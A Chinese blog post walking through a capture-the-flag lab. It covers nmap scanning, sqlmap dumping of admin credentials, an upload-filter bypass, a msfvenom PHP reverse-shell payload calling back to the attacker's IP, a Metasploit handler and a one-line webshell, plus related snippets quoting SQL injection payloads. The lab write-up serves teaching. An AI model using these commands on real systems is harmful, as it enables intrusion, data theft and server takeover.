SQL注入-GET参数注入

已于 2024-01-15 09:36:24 修改
阅读量718 收藏 1
点赞数
分类专栏: # sql注入 文章标签: 数据库 信息安全
于 2021-01-20 15:25:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43850721/article/details/112879224
版权

CTF练习

第一次CTF练习

1.拿到虚拟机后开启
一开始想用外部Xshell连接它,被老冯骂了一顿

2.开启kali用nmap扫描该机器
nmap 192.168.80.135
发现该机器开启了22和80端口
说明该机器开启了ssh和http服务

3.浏览器查看该机器的http服务
http://192.168.80.135
发现网站,有四个页面,前三个是展示界面,第四个是登录界面
尝试登录

4.用burpsuite抓包
尝试进行用户名和密码爆破,失败
失败原因:密码字典不够强大(后面查看发现只有8位数字和六位密码,需要扩充自己的密码本)

5.用owasp扫描网站
发现SQL注入的漏洞,将url复制(后面的参数不用复制)

6.用sqlmap进行sql注入
sqlmap -u “复制的url”–dbs 查询数据库
-D “db_name”–tables 查询数据库db_name的所有表
-T “AA” --columns查询表AA的所有字段
-C “BB”–dump 查询BB列的数据
其中有好几个“y”,使用sqlmap的默认字典进行破解
成功。进入数据库,提取到用户名admin和密码p4ssw0rd
使用用户名和密码登录第四个界面
发现可以上传文件

7.使用msfvenom生成小马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8899 -f raw
默认端口是4444,不写端口的话后面监听的就是4444端口
raw就是直接生成语句,在终端直接显示,不用放到任何文件中
新建test.php文件并将语句粘贴进去,上传
网页显示:“NO PHP!”将后缀改为PHP,再次上传成功

8.开启msfconsole
使用payload:exploit/multi/handler监听129的8899端口得到回连的session
成功拿到shell

9.用一句话木马,上传一句话木马文件,使用菜刀连接后可对135上的文件进行增删改查

王木木同学的微信账号
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 3961
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
SQL注入之基于参数类型注入
DM766924的博客
09-10 374
基于联合查询的注入: 1.判断注入点及闭合方式 1)判断闭合方式 闭合方式有很多种,主要有以下几种 无闭合、'、"、')、")、))等情况 2)利用and 1=1 --+ 判断结果 举例 select * from user where id=1 and 1=1 --+ 结果和不加的一致 3)利用and 1=2 --+判断结果 举例 select * from user where id=1 and 1=2 --+ 结果和不加的完全相反 2.判断查询列数及回显位置 order by 数字
SQL注入之GET型
qq_51393133的博客
09-11 903
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
GET型sql注入教学
m0_67265441的博客
01-29 760
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列名把数据都列出来。第六步:通过表名查询列名。第一步:判断页面真假值。
【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)
MachineGunJoe666
04-27 4854
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
实验:学习GET注入
茶花语的博客
02-25 4940
使用sqlmap工具,基于GET请求SQL注入实验
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 848
owasp十大漏洞中第一的sql注入
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 643
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
第四节 基于报错的SQL注入-01
09-15
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入分类 SQL注入可以根据...
简单的sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
DB2数据库SQL注入手册1
08-08
2. 参数化查询:使用参数化查询可以防止SQL注入攻击,因为恶意代码无法被作为参数传递。 3. 访问控制:限制数据库访问权限,以防止未经授权的访问。 常见SQL注入攻击 以下是一些常见的SQL注入攻击: 1. Union攻击...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1222
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
SQL注入GET参数
FXHQAQ的博客
12-20 964
1、SQL注入漏洞介绍 sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 SQL注入的产生原因通常表现在以下几个方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处...
SQL注入
qq_62803993的博客
01-08 1281
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
SQL注入--get注入
weixin_52151447的博客
11-11 2399
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
SQL注入总结 附带sqlmap使用参数
weixin_52206305的博客
03-07 1039
SQL注入漏洞(SQLinjection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一。在2005年前后,SQL注入漏洞到处可见,在用户登录或者搜索时,只需要输入一个单引号就可以检测出这种漏洞。随着Web应用程序的安全性不断提高,SQL注入漏洞逐渐减少,同时也变得更加难以检测与利用。
初始C++
最新发布
2302_81016149的博客
07-08 805
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
sql注入getshell
09-09
### 回答1: SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。...总之,SQL注入是一种严重的安全问题,开发者应该重视,并采取相应的安全措施来防止SQL注入GetShell漏洞的发生,保护用户和系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值